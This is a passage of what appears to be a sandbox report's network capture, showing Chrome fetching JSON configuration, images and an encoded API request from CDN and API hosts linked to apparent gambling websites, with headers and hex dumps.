                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:07 UTC531INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:06 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 5b6e22c950501920595c86fc25834582.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: FRA60-P3
                                                                                                                                                          X-Amz-Cf-Id: 6JowMMVqxB2rZ1aXJlZfjIJPw9byzLUa7V-YKFW-euslh6AInxo0Kg==
                                                                                                                                                          2024-06-09 22:41:07 UTC14118INData Raw: 33 37 31 65 0d 0a 7b 0a 20 20 20 20 22 6e 6e 6e 22 3a 20 22 6f 75 74 65 72 2d 38 38 38 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 6d 22 3a 20 22 32 34 30 36 30 36 2d 30 31 22 2c 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 70 63 5f 6d 65 6d 62 65 72 22 3a 20 22 32 34 30 35 32 39 2d 30 31 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 68 74 74 70 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 43 44 4e 5f 50 41 54 48 53 22 3a 20 5b 22 7a 62 2d 71 71 2e 67 7a 6a 71 77 6c 6b 6a 2e 63 6f 6d 22 2c 22 7a 62 31 2d 68 77 2e 71 65 63 74 79 6f 75 61 2e 63 6f 6d 22 2c 22 7a 62 2d 68 77 2e 63 7a 77 79 67 73 2e 63 6f 6d 22 5d 2c 0a 20 20 20 20 20 20 20 20 22 41 50 49 5f 44 4f 4d 41 49 4e 53 22 3a 20 5b 22 6f 63 73 61 70 69 2d 6c
                                                                                                                                                          Data Ascii: 371e{ "nnn": "outer-888", "versions": { "zb_m": "240606-01", "zb_pc_member": "240529-01" }, "http": { "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"], "API_DOMAINS": ["ocsapi-l
                                                                                                                                                          2024-06-09 22:41:07 UTC4286INData Raw: 31 30 62 36 0d 0a 37 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 39 37 34 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 31 33 2d 30 33 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 39 37 35 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 39 37 36 22 3a 20 22 32 33 30 36 30 37 2d 30 31 22 2c 0a 09 22 74 33 39 37 37 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 39 7d 2c 0a 09 22 74 33 39 37 38 22 3a 20 22 32 33 30 36 30 37 2d 30 31 22 2c 0a 09 22 74 33 39 37 39 22 3a 20 7b 22 76 22 3a 22 32 34 30 31 33 30 2d 30 31 22 2c 22 74 22 3a 31 30 39 7d 2c 0a 09 22 74 33 39 38 30 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 32 30 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22
                                                                                                                                                          Data Ascii: 10b67-01","t":104},"t3974": {"v":"230613-03","t":101},"t3975": {"v":"240516-03","t":108},"t3976": "230607-01","t3977": {"v":"230607-01","t":109},"t3978": "230607-01","t3979": {"v":"240130-01","t":109},"t3980": {"v":"230620-01","t":104},"
                                                                                                                                                          2024-06-09 22:41:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          285192.168.2.55002147.246.46.2434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:06 UTC557OUTGET /ocs/zbw?r=7649153494 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://yh8613.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:06 UTC487INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:06 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache36.l2hk3[6,0], cache40.l2sg3[42,0], ens-cache2.it4[215,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: 2ff62e9617179728664373192e
                                                                                                                                                          2024-06-09 22:41:06 UTC2916INData Raw: 62 35 64 0d 0a 7b 0a 20 20 20 20 22 6e 6e 6e 22 3a 20 22 6f 75 74 65 72 2d 38 38 38 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 6d 22 3a 20 22 32 34 30 36 30 36 2d 30 31 22 2c 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 70 63 5f 6d 65 6d 62 65 72 22 3a 20 22 32 34 30 35 32 39 2d 30 31 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 68 74 74 70 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 43 44 4e 5f 50 41 54 48 53 22 3a 20 5b 22 7a 62 2d 71 71 2e 67 7a 6a 71 77 6c 6b 6a 2e 63 6f 6d 22 2c 22 7a 62 31 2d 68 77 2e 71 65 63 74 79 6f 75 61 2e 63 6f 6d 22 2c 22 7a 62 2d 68 77 2e 63 7a 77 79 67 73 2e 63 6f 6d 22 5d 2c 0a 20 20 20 20 20 20 20 20 22 41 50 49 5f 44 4f 4d 41 49 4e 53 22 3a 20 5b 22 6f 63 73 61 70 69 2d 6c 63
                                                                                                                                                          Data Ascii: b5d{ "nnn": "outer-888", "versions": { "zb_m": "240606-01", "zb_pc_member": "240529-01" }, "http": { "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"], "API_DOMAINS": ["ocsapi-lc
                                                                                                                                                          2024-06-09 22:41:06 UTC8192INData Raw: 31 66 66 38 0d 0a 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 34 37 34 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 34 38 31 22 3a 20 22 32 34 30 35 31 36 2d 30 33 22 2c 0a 09 22 74 33 34 38 35 22 3a 20 7b 22 76 22 3a 22 32 34 30 31 33 30 2d 30 31 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 34 39 34 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 34 39 35 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 35 30 30 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 35 30 34 22 3a 20 7b 22 76 22 3a 22 32 32 31 30 31 32 2d
                                                                                                                                                          Data Ascii: 1ff8516-03","t":101},"t3474": {"v":"240516-03","t":104},"t3481": "240516-03","t3485": {"v":"240130-01","t":101},"t3494": {"v":"240516-03","t":101},"t3495": {"v":"240516-03","t":101},"t3500": {"v":"240516-03","t":101},"t3504": {"v":"221012-
                                                                                                                                                          2024-06-09 22:41:06 UTC2921INData Raw: 62 36 32 0d 0a 76 22 3a 22 32 32 31 30 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 38 36 32 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 38 36 33 22 3a 20 7b 22 76 22 3a 22 32 32 30 38 31 35 2d 30 31 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 38 36 34 22 3a 20 7b 22 76 22 3a 22 32 32 31 30 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 38 36 35 22 3a 20 7b 22 76 22 3a 22 32 32 31 30 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 38 36 36 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 38 36 37 22 3a 20 7b 22 76 22 3a 22 32 32 31 30 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74
                                                                                                                                                          Data Ascii: b62v":"221007-01","t":104},"t3862": {"v":"230607-01","t":101},"t3863": {"v":"220815-01","t":108},"t3864": {"v":"221007-01","t":108},"t3865": {"v":"221007-01","t":104},"t3866": {"v":"240516-03","t":101},"t3867": {"v":"221007-01","t":101},"t
                                                                                                                                                          2024-06-09 22:41:06 UTC1462INData Raw: 35 61 66 0d 0a 31 36 2d 30 33 22 2c 0a 09 22 74 33 39 37 31 22 3a 20 7b 22 76 22 3a 22 32 33 30 38 31 38 2d 30 34 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 39 37 32 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 31 33 2d 30 33 22 2c 22 74 22 3a 31 31 30 7d 2c 0a 09 22 74 33 39 37 33 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 39 37 34 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 31 33 2d 30 33 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 39 37 35 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 39 37 36 22 3a 20 22 32 33 30 36 30 37 2d 30 31 22 2c 0a 09 22 74 33 39 37 37 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 39
                                                                                                                                                          Data Ascii: 5af16-03","t3971": {"v":"230818-04","t":101},"t3972": {"v":"230613-03","t":110},"t3973": {"v":"230607-01","t":104},"t3974": {"v":"230613-03","t":101},"t3975": {"v":"240516-03","t":108},"t3976": "230607-01","t3977": {"v":"230607-01","t":109
                                                                                                                                                          2024-06-09 22:41:06 UTC1473INData Raw: 35 62 61 0d 0a 31 31 7d 2c 0a 09 22 74 34 30 31 36 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 30 32 2d 30 31 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 34 30 31 37 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 30 32 2d 30 31 22 2c 22 74 22 3a 31 31 31 7d 2c 0a 09 22 74 34 30 31 38 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 34 30 31 39 22 3a 20 7b 22 76 22 3a 22 32 33 31 30 30 35 2d 30 31 22 2c 22 74 22 3a 31 31 38 7d 2c 0a 09 22 74 34 30 32 30 22 3a 20 7b 22 76 22 3a 22 32 33 31 30 30 35 2d 30 31 22 2c 22 74 22 3a 31 31 31 7d 2c 0a 09 22 74 34 30 32 31 22 3a 20 22 32 34 30 35 30 32 2d 30 31 22 2c 0a 09 22 74 34 30 32 32 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 33 7d 2c 0a
                                                                                                                                                          Data Ascii: 5ba11},"t4016": {"v":"240502-01","t":101},"t4017": {"v":"240502-01","t":111},"t4018": {"v":"240516-03","t":101},"t4019": {"v":"231005-01","t":118},"t4020": {"v":"231005-01","t":111},"t4021": "240502-01","t4022": {"v":"240516-03","t":103},
                                                                                                                                                          2024-06-09 22:41:06 UTC1467INData Raw: 35 62 34 0d 0a 34 30 35 31 36 2d 30 33 22 2c 0a 09 22 74 34 30 37 32 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 31 37 7d 2c 0a 09 22 74 34 30 37 33 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 34 30 37 35 22 3a 20 7b 22 76 22 3a 22 32 34 30 31 33 30 2d 30 31 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 34 30 37 36 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 31 38 7d 2c 0a 09 22 74 34 30 37 37 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 34 30 37 38 22 3a 20 7b 22 76 22 3a 22 32 34 30 31 33 30 2d 30 31 22 2c 22 74 22 3a 31 31 30 7d 2c 0a 09 22 74 34 30 37 39 22 3a 20 7b 22 76 22 3a 22 32
                                                                                                                                                          Data Ascii: 5b440516-03","t4072": {"v":"240516-03","t":117},"t4073": {"v":"240516-03","t":108},"t4075": {"v":"240130-01","t":108},"t4076": {"v":"240516-03","t":118},"t4077": {"v":"240516-03","t":104},"t4078": {"v":"240130-01","t":110},"t4079": {"v":"2
                                                                                                                                                          2024-06-09 22:41:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          286192.168.2.55004090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:06 UTC609OUTGET /pc/image-pc/index/312/service/pb_icon.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:07 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:07 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 7640
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:58 GMT
                                                                                                                                                          ETag: "5d71fe8a-1dd8"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[4],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE9[3],EU-FRA-paris-GLOBAL1-CACHE19[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465113
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: fab557065a90d86dc8f4305f0e985649
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126887
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:07 UTC7640INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4a 00 00 00 45 08 06 00 00 00 ed 86 70 a4 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 1c ef 49 44 41 54 78 da dd 9c 7b 9c 65 55 75 e7 bf 7b ed 7d ce 7d 56 55 57 37 dd 08 08 c2 90 40 8c 3a c9 47 8d 1f 4d 8c ce 44 a3 f8 89 10 8c 60 f3 10 11 50 23 0a c4 f8 36 13 1d 27 51 c7 4f 12 31 3e 92 8c 28 62 23 cd 43 5e 46 25 c0 48 4c 24 c6 98 98 49 d4 21 0a a8 20 20 cf 7e 57 d5 7d 9d b3 f7 5a f3 c7 39 f7 d6 ad a6 ab 68 13 e6 03 1f 77 7d 76 57 77 d5 bd fb 9e fd db 6b af f5 5b bf bd 76 3b 1e cf 4d 02 e4 4d e8 ce b1 f9 fa
                                                                                                                                                          Data Ascii: PNGIHDRJEpgAMAa cHRMz&u0`:pQ<bKGDIDATx{eUu{}}VUW7@:GMD`P#6'QO1>(b#C^F%HL$I! ~W}Z9hw}vWwk[v;MM


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          287192.168.2.55004418.245.199.584434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:06 UTC675OUTPOST /zb-cloud/pwv/sn.website.logo.image.url HTTP/1.1
                                                                                                                                                          Host: ocsapi-aws.huayidm.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 528
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://hg679.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:06 UTC528OUTData Raw: 6a 73 6f 6e 3d 70 77 76 7c 31 33 7c 41 4e 6d 41 4e 57 48 72 6d 41 50 77 59 61 42 6d 59 30 48 79 44 73 4c 6c 58 76 68 33 52 6e 66 32 51 4e 63 34 4d 52 61 33 4e 79 56 6c 59 76 4c 73 5a 77 59 62 4c 66 62 64 61 32 35 6a 6f 58 46 6d 59 6d 56 63 56 30 48 7a 57 66 46 64 50 69 44 76 4d 68 47 6a 4e 61 4e 79 59 77 41 6e 49 56 56 72 61 32 4a 78 51 69 54 78 44 30 58 6d 59 6d 57 71 6b 6c 35 33 4e 47 46 77 66 42 51 6f 56 6d 76 74 58 32 38 76 71 58 31 75 4c 32 48 6c 78 47 48 77 4d 53 42 6b 4e 53 55 50 41 4d 4a 6b 66 54 57 68 42 4b 31 6a 46 51 4e 63 49 57 58 42 48 52 62 44 5a 55 56 6b 70 32 34 63 47 73 47 70 50 30 44 65 59 6e 49 64 6e 55 58 7a 56 57 56 70 53 57 58 4e 46 51 4e 63 63 4a 46 74 61 43 6a 6c 5a 55 56 6b 57 4b 48 4b 48 58 4c 78 77 50 55 76 5a 46 56 65 4e 76 4c
                                                                                                                                                          Data Ascii: json=pwv|13|ANmANWHrmAPwYaBmY0HyDsLlXvh3Rnf2QNc4MRa3NyVlYvLsZwYbLfbda25joXFmYmVcV0HzWfFdPiDvMhGjNaNyYwAnIVVra2JxQiTxD0XmYmWqkl53NGFwfBQoVmvtX28vqX1uL2HlxGHwMSBkNSUPAMJkfTWhBK1jFQNcIWXBHRbDZUVkp24cGsGpP0DeYnIdnUXzVWVpSWXNFQNccJFtaCjlZUVkWKHKHXLxwPUvZFVeNvL
                                                                                                                                                          2024-06-09 22:41:07 UTC595INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:07 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          vary: Accept-Encoding,Accept-Encoding
                                                                                                                                                          api-elapsed: 4
                                                                                                                                                          x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                          x-via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          via: 1.1 google, 1.1 169ff0c102310938c25469b9cabc0458.cloudfront.net (CloudFront)
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          X-Amz-Cf-Pop: CDG55-P2
                                                                                                                                                          X-Amz-Cf-Id: AbmNMT2JtlBINx_UL8XXk4dF3lWUDA2Phv3s3PhOvQuyGch1jUfeCw==
                                                                                                                                                          2024-06-09 22:41:07 UTC114INData Raw: 36 63 0d 0a 7b 22 69 64 22 3a 22 31 37 39 37 32 38 36 34 37 38 39 37 37 32 22 2c 22 72 65 73 75 6c 74 22 3a 22 2f 66 69 6c 65 75 70 6c 6f 61 64 2f 6c 6c 31 32 2f 32 30 32 33 31 32 2f 32 30 32 33 31 32 32 32 32 31 32 39 30 35 30 2e 70 6e 67 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 7d 0a 0d 0a
                                                                                                                                                          Data Ascii: 6c{"id":"17972864789772","result":"/fileupload/ll12/202312/202312222129050.png","error":null,"jsonrpc":"2.0"}
                                                                                                                                                          2024-06-09 22:41:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          288192.168.2.55004290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:06 UTC643OUTGET /pc/image-pc/video/bbin_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:07 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:07 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 13380
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3444"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[6],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE14[17],EU-GER-frankfurt-GLOBAL1-CACHE14[0,TCP_HIT,15],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826102
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: d95e08833dbfd2ccfd4536adc9f0741e
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765898
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:07 UTC13380INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          289192.168.2.55004190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:06 UTC641OUTGET /pc/image-pc/video/pt_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
